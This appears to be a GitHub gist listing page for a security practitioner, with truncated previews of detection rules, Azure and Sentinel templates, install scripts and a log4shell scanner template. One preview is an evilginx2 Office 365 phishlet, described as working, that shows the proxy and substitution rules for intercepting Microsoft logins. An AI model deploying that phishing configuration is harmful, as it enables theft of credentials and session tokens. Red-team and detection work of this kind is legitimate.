Niels Hofmans hazcod
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| rule shai_hulud_malicious_npm_package_install { | |
| meta: | |
| author = "hazcod" | |
| date = "2025-11-24" | |
| description = "Detects the installation of malicious npm packages associated with the Shai-Hulud 2.0 supply chain attack campaign." | |
| reference = "https://www.wiz.io/blog/shai-hulud-2-0-ongoing-supply-chain-attack" | |
| tags = "SUPPLY_CHAIN, NPM, SHAI_HULUD, INITIAL_ACCESS" | |
| tactic = "TA0001" | |
| technique = "T1195" // T1195 (Supply Chain Compromise) is more specific than the provided T1190. | |
| false_positives = "Legitimate installations of these packages if the versions are different from the compromised ones, though the rule is designed to be specific. If a package is cleaned and republished under the same version, this could trigger." |
hazcod
/ pause-heating-on-window-open.yaml
Created
March 1, 2025 09:31
Home Assistant blueprint that pauses your heating when a window opens.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| blueprint: | |
| name: "Tado: Turn off heating when window is open" | |
| description: "Disables heating in a specific room when the window is open." | |
| domain: automation | |
| input: | |
| # the window which opens | |
| window_sensor: | |
| name: "Window Sensor" | |
| selector: | |
| entity: |
hazcod
/ entra-add-fido2-key.ps1
Created
November 18, 2024 07:20
PowerShell script to add a FIDO2 security key to an Entra account.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| .SYNOPSIS | |
| Register FIDO2 on behalf of another user | |
| .DESCRIPTION | |
| This script registers a FIDO2 key on behalf of another user. The script requires the admin to have a FIDO2 key and the user's UPN. | |
| The script will connect to Microsoft Graph and register the FIDO2 key on behalf of the user. | |
| The script will also register the FIDO2 key in Entra ID. | |
| #> | |
| param ( |
hazcod
/ logicapp-canary.json
Created
February 10, 2024 22:52
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "definition": { | |
| "$schema": "https://schema.management.azure.com/providers/Microsoft.Logic/schemas/2016-06-01/workflowdefinition.json#", | |
| "actions": { | |
| "Condition": { | |
| "actions": { | |
| "Terminate": { | |
| "inputs": { | |
| "runStatus": "Cancelled" | |
| }, |
hazcod
/ ms-sentinel-dcr-template.yml
Created
November 29, 2023 10:11
Microsoft Sentinel resource template for creating a Data Collector Rule (DCR) to ingest custom logs into Microsoft Sentinel SIEM.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", | |
| "contentVersion": "1.0.0.0", | |
| "parameters": { | |
| "dataCollectionRules_OnePasswordLogs_name": { | |
| "defaultValue": "OnePasswordLogs", | |
| "type": "String" | |
| }, | |
| "dataCollectionEndpoints_1password_externalid": { | |
| "defaultValue": "/subscriptions/SUBSCRIPTION-ID-HERE/resourceGroups/myresgroup/providers/Microsoft.OperationalInsights/dataCollectionEndpoints/1password", |
hazcod
/ evilginx-o365-phishlet.yml
Last active
May 23, 2025 13:06
Working Office365 phishlet for evilginx2.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| author: '@hazcod' | |
| min_ver: '3.2.0' | |
| proxy_hosts: | |
| - {phish_sub: 'login', orig_sub: 'login', domain: 'microsoftonline.com', session: true, is_landing: true} | |
| - {phish_sub: 'www', orig_sub: 'www', domain: 'office.com', session: false, is_landing:false} | |
| sub_filters: | |
| - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} | |
| - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true} |
hazcod
/ get-intigriti-program-domains.sh
Created
April 7, 2022 09:17
Retrieves domains from the Intigriti public program on the public website.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env bash | |
| join_by() | |
| { | |
| local IFS="$1" | |
| shift | |
| echo "$*" | |
| } | |
| data=$(curl -s https://www.intigriti.com/programs) |
hazcod
/ CVE-2021-44228.nuclei.yaml
Last active
December 18, 2023 06:50
Nuclei template to scan for log4shell (CVE-2021-44228).
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| id: CVE-2021-44228 | |
| info: | |
| name: Log4J RCE | |
| author: iNvist / hazcod | |
| severity: critical | |
| description: CVE-2021-44228 | |
| requests: | |
| - raw: |
hazcod
/ falcon-autoinstall.sh
Last active
October 22, 2023 12:58
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env bash | |
| CLIENT_ID="_FALCON_API_CLIENT_ID_" | |
| CLIENT_SECRET="FALCON_API_CLIENT_SECRET_" | |
| CID="_FALCON_CID_" | |
| TOKEN="_FALCON_INSTALL_TOKEN" | |
| API_HOST="api.eu-1.crowdstrike.com" | |
| function main() { |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| import ( | |
| "flag" | |
| "fmt" | |
| "github.com/go-piv/piv-go/piv" | |
| conf "github.com/hazcod/sop/config" | |
| "github.com/pkg/errors" | |
| "github.com/sirupsen/logrus" | |
| "os" |
NewerOlder